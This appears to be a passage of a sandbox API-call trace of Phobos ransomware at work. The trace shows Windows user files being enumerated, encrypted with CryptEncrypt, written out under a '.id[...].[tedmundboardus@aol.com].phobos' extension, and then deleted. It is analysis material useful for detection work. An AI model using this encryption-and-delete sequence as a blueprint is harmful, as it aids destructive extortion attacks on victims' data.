dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0205.699] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0205.699] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\Indexer\\CiFiles\\CiAB0001.001" (normalized: "c:\\users\\all users\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\indexer\\cifiles\\ciab0001.001"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0205.699] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=0) returned 1 [0205.699] CloseHandle (hObject=0xfc) returned 1 [0205.700] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0205.700] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\Indexer\\CiFiles\\CiAB0001.002" (normalized: "c:\\users\\all users\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\indexer\\cifiles\\ciab0001.002"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0205.700] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=0) returned 1 [0205.700] CloseHandle (hObject=0xfc) returned 1 [0205.700] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0205.700] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\Indexer\\CiFiles\\CiAB0002.001" (normalized: "c:\\users\\all users\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\indexer\\cifiles\\ciab0002.001"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0205.700] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=0) returned 1 [0205.700] CloseHandle (hObject=0xfc) returned 1 [0205.701] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0205.701] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\Indexer\\CiFiles\\CiAB0002.002" (normalized: "c:\\users\\all users\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\indexer\\cifiles\\ciab0002.002"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0205.701] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=0) returned 1 [0205.701] CloseHandle (hObject=0xfc) returned 1 [0205.701] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0205.701] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\Indexer\\CiFiles\\CiAD0001.001" (normalized: "c:\\users\\all users\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\indexer\\cifiles\\ciad0001.001"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0205.701] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=0) returned 1 [0205.701] CloseHandle (hObject=0xfc) returned 1 [0205.701] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0205.701] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\Indexer\\CiFiles\\CiAD0001.002" (normalized: "c:\\users\\all users\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\indexer\\cifiles\\ciad0001.002"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0205.702] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=0) returned 1 [0205.702] CloseHandle (hObject=0xfc) returned 1 [0205.702] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0205.702] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows\\DeviceMetadataStore\\en-US\\34e548a8-3268-4dde-bedf-c40f9b6c814a.devicemetadata-ms" (normalized: "c:\\users\\all users\\microsoft\\windows\\devicemetadatastore\\en-us\\34e548a8-3268-4dde-bedf-c40f9b6c814a.devicemetadata-ms"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0205.702] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=14134) returned 1 [0205.702] CloseHandle (hObject=0xfc) returned 1 [0205.702] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows\\DeviceMetadataStore\\en-US\\34e548a8-3268-4dde-bedf-c40f9b6c814a.devicemetadata-ms" (normalized: "c:\\users\\all users\\microsoft\\windows\\devicemetadatastore\\en-us\\34e548a8-3268-4dde-bedf-c40f9b6c814a.devicemetadata-ms")) returned 0x20 [0205.702] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows\\DeviceMetadataStore\\en-US\\34e548a8-3268-4dde-bedf-c40f9b6c814a.devicemetadata-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\all users\\microsoft\\windows\\devicemetadatastore\\en-us\\34e548a8-3268-4dde-bedf-c40f9b6c814a.devicemetadata-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0205.702] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows\\DeviceMetadataStore\\en-US\\34e548a8-3268-4dde-bedf-c40f9b6c814a.devicemetadata-ms" (normalized: "c:\\users\\all users\\microsoft\\windows\\devicemetadatastore\\en-us\\34e548a8-3268-4dde-bedf-c40f9b6c814a.devicemetadata-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0205.703] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0205.703] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows\\DeviceMetadataStore\\en-US\\63921eef-8415-4368-9201-f0df4af5778f.devicemetadata-ms" (normalized: "c:\\users\\all users\\microsoft\\windows\\devicemetadatastore\\en-us\\63921eef-8415-4368-9201-f0df4af5778f.devicemetadata-ms"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0205.703] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=110457) returned 1 [0205.703] CloseHandle (hObject=0xfc) returned 1 [0205.703] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows\\DeviceMetadataStore\\en-US\\63921eef-8415-4368-9201-f0df4af5778f.devicemetadata-ms" (normalized: "c:\\users\\all users\\microsoft\\windows\\devicemetadatastore\\en-us\\63921eef-8415-4368-9201-f0df4af5778f.devicemetadata-ms")) returned 0x20 [0205.703] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows\\DeviceMetadataStore\\en-US\\63921eef-8415-4368-9201-f0df4af5778f.devicemetadata-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\all users\\microsoft\\windows\\devicemetadatastore\\en-us\\63921eef-8415-4368-9201-f0df4af5778f.devicemetadata-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0205.703] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows\\DeviceMetadataStore\\en-US\\63921eef-8415-4368-9201-f0df4af5778f.devicemetadata-ms" (normalized: "c:\\users\\all users\\microsoft\\windows\\devicemetadatastore\\en-us\\63921eef-8415-4368-9201-f0df4af5778f.devicemetadata-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0205.703] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0205.704] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\confident.cov" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\common coverpages\\en-us\\confident.cov"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0205.704] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=10410) returned 1 [0205.704] CloseHandle (hObject=0xfc) returned 1 [0205.705] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\confident.cov" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\common coverpages\\en-us\\confident.cov")) returned 0x20 [0205.705] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\confident.cov.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\common coverpages\\en-us\\confident.cov.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0205.705] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\confident.cov" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\common coverpages\\en-us\\confident.cov"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0205.705] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0205.705] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\fyi.cov" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\common coverpages\\en-us\\fyi.cov"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0205.705] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=10761) returned 1 [0205.705] CloseHandle (hObject=0xfc) returned 1 [0205.705] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\fyi.cov" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\common coverpages\\en-us\\fyi.cov")) returned 0x20 [0205.705] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\fyi.cov.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\common coverpages\\en-us\\fyi.cov.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0205.705] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\fyi.cov" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\common coverpages\\en-us\\fyi.cov"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0205.706] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0205.706] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\generic.cov" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\common coverpages\\en-us\\generic.cov"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0205.706] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=15008) returned 1 [0205.706] CloseHandle (hObject=0xfc) returned 1 [0205.706] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\generic.cov" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\common coverpages\\en-us\\generic.cov")) returned 0x20 [0205.706] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\generic.cov.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\common coverpages\\en-us\\generic.cov.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0205.706] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\generic.cov" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\common coverpages\\en-us\\generic.cov"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0205.706] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0205.706] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\urgent.cov" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\common coverpages\\en-us\\urgent.cov"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0205.707] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=10374) returned 1 [0205.707] CloseHandle (hObject=0xfc) returned 1 [0205.707] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\urgent.cov" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\common coverpages\\en-us\\urgent.cov")) returned 0x20 [0205.707] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\urgent.cov.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\common coverpages\\en-us\\urgent.cov.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0205.707] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\urgent.cov" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\common coverpages\\en-us\\urgent.cov"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0205.707] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0205.707] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\FeedsStore.feedsdb-ms" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\feedsstore.feedsdb-ms"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0205.707] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=6656) returned 1 [0205.707] CloseHandle (hObject=0xfc) returned 1 [0205.708] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\FeedsStore.feedsdb-ms" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\feedsstore.feedsdb-ms")) returned 0x2020 [0205.708] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\FeedsStore.feedsdb-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\feedsstore.feedsdb-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0205.708] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\FeedsStore.feedsdb-ms" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\feedsstore.feedsdb-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0205.708] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0205.708] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0205.708] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\FeedsStore.feedsdb-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\feedsstore.feedsdb-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0205.708] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0205.708] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0205.708] ReadFile (in: hFile=0xfc, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x1a00, lpOverlapped=0x0) returned 1 [0205.929] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x1a10, dwBufLen=0x1a10 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x1a10) returned 1 [0205.929] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x1a10, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x1a10, lpOverlapped=0x0) returned 1 [0205.931] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32928) returned 1 [0205.931] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0205.931] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0205.931] CryptDestroyKey (hKey=0xa32928) returned 1 [0205.931] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0205.931] CryptDestroyKey (hKey=0xa328e8) returned 1 [0205.931] CloseHandle (hObject=0xfc) returned 1 [0205.931] CloseHandle (hObject=0x178) returned 1 [0205.932] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\FeedsStore.feedsdb-ms" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\feedsstore.feedsdb-ms")) returned 1 [0205.932] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0205.932] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Home~.feed-ms" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\microsoft at home~.feed-ms"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0205.934] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=28672) returned 1 [0205.934] CloseHandle (hObject=0x178) returned 1 [0205.934] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Home~.feed-ms" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\microsoft at home~.feed-ms")) returned 0x2020 [0205.934] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Home~.feed-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\microsoft at home~.feed-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0205.934] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Home~.feed-ms" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\microsoft at home~.feed-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0205.934] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0205.934] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0205.934] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Home~.feed-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\microsoft at home~.feed-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0205.935] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0205.935] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0205.935] ReadFile (in: hFile=0x178, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x7000, lpOverlapped=0x0) returned 1 [0206.187] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x7010, dwBufLen=0x7010 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x7010) returned 1 [0206.187] WriteFile (in: hFile=0xfc, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x7010, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x7010, lpOverlapped=0x0) returned 1 [0206.214] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32928) returned 1 [0206.214] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0206.214] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x60, dwBufLen=0x60 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x60) returned 1 [0206.214] CryptDestroyKey (hKey=0xa32928) returned 1 [0206.214] WriteFile (in: hFile=0xfc, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x112, lpOverlapped=0x0) returned 1 [0206.214] CryptDestroyKey (hKey=0xa328e8) returned 1 [0206.215] CloseHandle (hObject=0x178) returned 1 [0206.215] CloseHandle (hObject=0xfc) returned 1 [0206.215] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Home~.feed-ms" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\microsoft at home~.feed-ms")) returned 1 [0206.216] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0206.216] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Work~.feed-ms" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\microsoft at work~.feed-ms"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0206.216] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=28672) returned 1 [0206.216] CloseHandle (hObject=0xfc) returned 1 [0206.216] GetFileAttributesW 